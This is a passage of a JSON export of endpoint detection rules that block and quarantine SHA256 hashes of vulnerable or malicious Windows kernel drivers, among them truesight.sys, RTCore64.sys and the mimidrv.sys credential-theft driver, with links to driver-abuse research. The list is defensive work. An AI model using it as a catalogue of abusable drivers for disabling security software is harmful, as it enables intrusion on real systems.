+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "01161d5f-dfb7-5023-abd9-05f8e5b8f517", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822818Z", + "creation_date": "2026-03-23T11:45:30.822820Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822825Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "39336e2ce105901ab65021d6fdc3932d3d6aab665fe4bd55aa1aa66eb0de32f0", + "comment": "Vulnerable Kernel Driver (aka SBIOSIO64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "012cb417-ac19-5fc3-9236-07ed24c46b07", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:31.823335Z", + "creation_date": "2026-03-23T11:45:31.823339Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823346Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b43a6483567a78f3f1158ca875a3dbcad3edfc024d2ccaeace03fb7be6db449e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "01305fd2-188e-5e40-a33a-4d81a546af35", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619750Z", + "creation_date": "2026-03-23T11:45:29.619752Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619757Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee6bfdf5748fbbf579d6176026626ef39a0673e307c2029f5633e80f0babef54", + "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "01467ec8-c1bd-5919-a5ae-c16772a2fc74", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146013Z", + "creation_date": "2026-03-23T11:45:31.146017Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146026Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6c661ccb40bb80b66a8e376aaf8ed638c0860a606195cb3cb5b781b69a942534", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "014b2e74-f1de-525a-a953-c0f445c7db9a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470727Z", + "creation_date": "2026-03-23T11:45:30.470730Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470739Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "46aac78f7cd865d27189c8308841f12a5512e657be0dd6e8b178aac5223889fe", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0155c3ca-9d4c-5211-90ac-e0fe8711662c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488396Z", + "creation_date": "2026-03-23T11:45:31.488398Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488403Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c6c906d3e5e00067ffe1b176bd94dbe8a119435039e3ac3ddfec326fc0956d77", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0157f476-c466-53d7-8670-1e244f9cdd26", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982449Z", + "creation_date": "2026-03-23T11:45:29.982451Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982457Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4941c4298f4560fc1e59d0f16f84bab5c060793700b82be2fd7c63735f1657a8", + "comment": "Vulnerable Kernel Driver (aka windows7-32.sys) [https://www.loldrivers.io/drivers/b45a3fdf-592a-4cd9-81e2-8fe03d554cad/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "016175ac-e9a7-57b5-a683-9e1053a9bd84", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827595Z", + "creation_date": "2026-03-23T11:45:30.827597Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827603Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "54d5c4a62a2eed43d0e680587ec6f8063d1d48908b2ab4562816ffed8f52c263", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "01659f83-3662-5629-be7b-1354117d1314", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147717Z", + "creation_date": "2026-03-23T11:45:31.147718Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147724Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ec85aa2349c95884af3dfbfc8bfebd40a71963f107d1176b8891fde2b614b310", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0169ef2f-fb28-5bc3-bed7-b2aabb90dd7d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616569Z", + "creation_date": "2026-03-23T11:45:29.616571Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616577Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "01733296-4ba1-5d5a-b233-79903da3bdfd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464939Z", + "creation_date": "2026-03-23T11:45:30.464942Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464957Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "93aa3066ae831cdf81505e1bc5035227dc0e8f06ebbbb777832a17920c6a02fe", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "017447d4-88a2-5447-aa80-d987c13d331a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621333Z", + "creation_date": "2026-03-23T11:45:29.621335Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621340Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9dcfd796e244d0687cc35eac9538f209f76c6df12de166f19dbc7d2c47fb16b3", + "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0179b98d-3214-5d53-87b6-87143663638b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479974Z", + "creation_date": "2026-03-23T11:45:30.479976Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479981Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e4658d93544f69f5cb9aa6d9fec420fecc8750cb57e1e9798da38c139d44f2eb", + "comment": "Vulnerable Kernel Driver (aka AsmIo64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "017c91ba-fe9d-5512-a44e-606373270abc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146099Z", + "creation_date": "2026-03-23T11:45:32.146101Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146106Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8dbc28fefb8cf9377be55a7c6062988df5a24f0ff475f6dd65cf07fe5173f51d", + "comment": "Vulnerable Kernel Driver (aka neofltr.sys) [https://www.loldrivers.io/drivers/c44e6197-efab-49d2-8a5f-04ae4a0f0ea0/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "01878dd6-bfc7-5836-855e-f2beabffc97b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460125Z", + "creation_date": "2026-03-23T11:45:30.460128Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460136Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd2c1aa4e14c825f3715891bfa2b6264650a794f366d5f73ed1ef1d79ff0dbf9", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "018df02d-8389-5fa3-b401-d54fdda39937", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823979Z", + "creation_date": "2026-03-23T11:45:31.823982Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823991Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 
"value": "090e352c8943316c242e1889f0e7304819d502300a529499a1fb29124ca33646", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0198378f-55b8-5f80-965b-d73b6859e7f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823389Z", + "creation_date": "2026-03-23T11:45:31.823393Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823401Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7831ba304ffc9cb1ff0f70a51a255d03acbb8edd801d61f0e0cb11b32da0384", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "019d4dce-e650-5223-90ad-8cea1af256a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": 
false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828803Z", + "creation_date": "2026-03-23T11:45:31.828805Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828810Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3728e8d692093a6111e8c0943e5f11ccff35a6395982dd065c992ac063446cf6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "01aa8931-6e43-562b-819d-3e1a96b8e116", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156002Z", + "creation_date": "2026-03-23T11:45:31.156004Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156010Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f9df4b81a03df605e808e8f819fc913cb00f2076bb55d187bf97b739c151b81f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) 
AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "01b18d44-e9ac-57d3-bcae-bbadb06812dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153560Z", + "creation_date": "2026-03-23T11:45:31.153562Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153567Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "03172eef01698a6d6eae38c6dcd1b0a9b75f8eb312502dd3b9408b62c553c0d9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "01b3fb1e-b0ee-5c01-96a3-422380933ded", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.470669Z", + "creation_date": "2026-03-23T11:45:30.470672Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470681Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b5590995c6bcd39884dceda1e87e8516a3767bce00519ce140a46f1a77666ff", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "01ca129a-4d80-51e6-b27c-8cf288301005", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148757Z", + "creation_date": "2026-03-23T11:45:31.148759Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148764Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d1170f7dfb5b27022f61c7e56fa74729f4c8721e1740f27f6ed3880a7fe277f0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + 
"id": "01d01c70-29b8-555d-b27c-309ad5221a06", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155031Z", + "creation_date": "2026-03-23T11:45:31.155033Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155039Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0b80d5bc658ec972223838494373244cdbc1e295b6ae48918ce9ac354d035ba4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "01d78120-0275-533e-a3d3-ca926cc43d6f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143006Z", + "creation_date": "2026-03-23T11:45:32.143008Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143013Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "39f5d351878f7216a69d0330c40e5b2793c6d4d3ee72f0673cf7555ea9dbe86a", + "comment": "Vulnerable TfSysMon driver from ThreatFire System Monitor (2013) (aka TfSysMon.sys) [https://github.com/BlackSnufkin/BYOVD/tree/main/TfSysMon-Killer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "01dbefe3-b15d-5b38-8d1c-535f2fd850d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469101Z", + "creation_date": "2026-03-23T11:45:30.469105Z", + "enabled": true, 